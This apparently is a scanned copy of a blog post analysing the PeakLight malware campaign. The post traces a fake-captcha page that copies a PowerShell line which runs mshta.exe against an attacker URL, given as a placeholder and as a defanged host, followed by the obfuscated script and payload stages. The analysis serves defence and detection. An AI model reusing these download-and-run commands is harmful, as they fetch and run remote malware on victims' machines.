himitsuflavor.medium.com
Open in
urlscan Pro
2606:4700:7::a29f:9804
Public Scan
Submitted URL: https://infosecwriteups.com/peaklight-campaign-mshta-a7f45aec50ab?source=rss------threat_intelligence-5%27
Effective URL: https://himitsuflavor.medium.com/peaklight-campaign-mshta-a7f45aec50ab?source=rss------threat_intelligence-5%27
Submission: On September 17 via api from US — Scanned from DE
Effective URL: https://himitsuflavor.medium.com/peaklight-campaign-mshta-a7f45aec50ab?source=rss------threat_intelligence-5%27
Submission: On September 17 via api from US — Scanned from DE
Form analysis
0 forms found in the DOMText Content
Open in app Sign up Sign in Write Sign up Sign in PEAKLIGHT CAMPAIGN — MSHTA NaotaClone · Follow Published in InfoSec Write-ups · 5 min read · 2 hours ago 1 Listen Share PEAKLIGHT MALWARE During these last months, the PeakLight Malware has taken a high prominence due to its violent infection campaign through CDN Links (Content Delivery) which is responsible for tricking the user into executing coded command lines or malicious artifacts through fake captcha and/or verification portals (Image 1.1). Image 1.1 Infection Method — High Level. It is designed for the theft of information and takeover of infected stations through different persistence and evasion techniques of protection and detection such as indirect executions through LOLBINS and a multi-stage infection chain. In turn, it takes advantage of directories with global permissions in order to facilitate the deployment of artifacts, given its modularity it uses both legitimate artifacts (different software generated by legitimate companies) and malicious artifacts that are responsible for completing the infection process. INFECTION CHAIN Given various intelligence sources, it is verified that the initial point of infection is carried out through advertising and pop-ups existing within different pages of the Internet which redirects a site with the domain *.b-cdn.net/* (image 2.1) that contains a verification captcha giving instructions to open Run on the system and paste a value. Image 2.1 b-cdn.net site with fake captcha. The string mentioned above is automatically copied to the clipboard when you click on the check button through the document.execCommand() function (image 2.2), the script specifies that the value to be copied will be a Base64 encoded Powershell line that executes the command Mshta.exe “<evil_url>”. Image 2.2 Script within the “*.b-cdn.net” site. For the infection chain to continue, the victim must follow these steps manually in order to correctly generate the conditions for the deployment of the artifacts, this can be identified through executions of Powershell.exe that have Explorer.exe parent process. As an example, this execution was carried out where Event ID 1 (Process Created) indicates the aforementioned parameters (image 2.3). Image 2.3 Powershell execution logs via Run. Consequently, it can be seen that the Payload contained in the PowerShell line corresponds to a Mshta.exe command line (image 2.4), which performs an indirect execution of the malicious artifact obtained through mshta.exe “clicktogo[*]click/Downloads/tra3” (image 2.5). Figure 2.4 MSHTA Command Line. Image 2.5 Download of tra3. The content generated by tra3 (image 2.5) corresponds to a compressed JavaScript file which has double obfuscation (image 2.6) based on the replacement of values through the positioning of variables. Image 2.6 JavaScript code obfuscated in tra3. Once the first phase has been deobfuscated, the call to different functions is observed that is responsible for executing the result of the second deobfuscation process through the ActiveXObject function (function used to create COM objects) contained in the Bin variable (image 2.7). Image 2.7 Second phase of deobfuscation. After the second phase, you can see the deobfuscated script which creates the WScript.Shell object to execute system command lines using Bin.Run that contains a Powershell script encrypted through the AES protocol (image 2.8). Image 2.9 Completely deobfuscated JavaScript code. This execution makes a network connection (image 2.11) to the clicktogo[*]click/Downloads/tar3.zip URL (obtained after decrypting and deobfuscating the Powershell command line). Figure 2.10 Network Connections — DNS Query. This process is responsible for downloading and establishing various artifacts (image 2.11) used by the attacker (image 2.12) within the attack chain on the system. Figure 2.11 Creating Files through tar3.zip. Figure 2.12 Binary Setup.exe generated by “tar3.zip”. Among the artifacts generated is Setup.exe (image 2.12) which executes automatically when executing the encrypted powershell, which generates the more.com process and the conhost.exe thread (image 2.13). Figure 2.13 Execution of Setup.exe. The More.com process in turn generates another process called RewardFlaccid.a3x (Figure 2.15) approximately 15 seconds after the Setup.exe process ends. Figure 2.15 Network activity generated by RewardFlaccid.a3x. > Once the network activity generated by RewardFlaccid.a3x is finished, the > process is terminated and the infection chain culminates with all the > artifacts already deployed on the victim’s station. INFECTION CHAIN Given the analysis carried out, the infection process can be summarized in 4 phases (Figure 3.1): 1. Initial Phase: Corresponds to Internet browsing on sites that contain ads and/or pop-ups related to PeakLight’s campaigns. 2. Access Point: The user falls for the attack by following the manual execution instructions outlined on the attacker’s site. 3. Execution Point: The lack of restrictions on the execution of command lines through the terminal allows the indirect execution of Mshta.exe which is responsible for downloading the artifacts. 4. Deployment Point: Once the artifacts are downloaded, they are deployed in the AppData\Local\* directory and run autonomously making network connections through TLS to the attacker’s site, culminating the infection process. Figure 3.1 Summary of infection chain. SIGN UP TO DISCOVER HUMAN STORIES THAT DEEPEN YOUR UNDERSTANDING OF THE WORLD. FREE Distraction-free reading. No ads. Organize your knowledge with lists and highlights. Tell your story. Find your audience. Sign up for free MEMBERSHIP Read member-only stories Support writers you read most Earn money for your writing Listen to audio narrations Read offline with the Medium app Try for 5 $/month Threat Hunting Malware Threat Intelligence Threat Modeling Threat Detection 1 1 Follow WRITTEN BY NAOTACLONE 2 Followers ·Writer for InfoSec Write-ups Sake no bink yo ho ho! Follow MORE FROM NAOTACLONE AND INFOSEC WRITE-UPS NaotaClone in InfoSec Write-ups ICMP EXFILTRATION WITH HIMITSU 1. ICMP PROTOCOL OVERVIEW Dec 14, 2023 2 NaotaClone in InfoSec Write-ups ICMP EXFILTRATION WITH HIMITSU 1. ICMP PROTOCOL OVERVIEW Dec 14, 2023 2 Dec 14, 2023 2 See all from NaotaClone See all from InfoSec Write-ups RECOMMENDED FROM MEDIUM Richard de Vries in Tales from a Security Professional THREAT INTELLIGENCE - THE LIFELINE FOR EVERY SECURITY OPERATION CENTER ESTABLISHING A CTI TEAM IS CRUCIAL FOR ENHANCING THE OPERATIONAL EFFICIENCY AND EFFECTIVENESS OF A SOC. Aug 25 1 Alexander Nguyen in Level Up Coding THE RESUME THAT GOT A SOFTWARE ENGINEER A $300,000 JOB AT GOOGLE. 1-PAGE. WELL-FORMATTED. Jun 1 21K 407 LISTS STAFF PICKS 734 stories·1301 saves STORIES TO HELP YOU LEVEL-UP AT WORK 19 stories·800 saves SELF-IMPROVEMENT 101 20 stories·2744 saves PRODUCTIVITY 101 20 stories·2350 saves VanVleet COMPOUND PROBABILITY: YOU DON’T NEED 100% COVERAGE TO WIN WHY YOU DON’T NEED TO HAVE 100% ATTACK SURFACE COVERAGE TO HAVE A STRONG CHANCE OF DETECTING ATTACKERS IN YOUR ENTERPRISE. Sep 5 28 1 Jonathan Mondaut HOW CHATGPT TURNED ME INTO A HACKER DISCOVER HOW CHATGPT HELPED ME BECOME A HACKER, FROM GATHERING RESOURCES TO TACKLING CTF CHALLENGES, ALL WITH THE POWER OF AI. Jun 18 1.1K 41 Jonas Bülow Knudsen in Posts By SpecterOps Team Members ADCS ATTACK PATHS IN BLOODHOUND — PART 3 IN THIS BLOG POST, WE WILL EXPLORE THE NEW ESC6/ESC9/ESC10 EDGES WE HAVE INTRODUCED WITH ADCS SUPPORT IN BLOODHOUND. 6d ago 15 Sathyaprakash Sahoo in InfoSec Write-ups HERE’S WHY I DON’T SUGGEST PEOPLE TO GET INTO CYBERSECURITY WHAT MOST WON’T TELL YOU ABOUT A CAREER IN CYBERSECURITY Sep 10 465 8 See more recommendations Help Status About Careers Press Blog Privacy Terms Text to speech Teams To make Medium work, we log user data. By using Medium, you agree to our Privacy Policy, including cookie policy.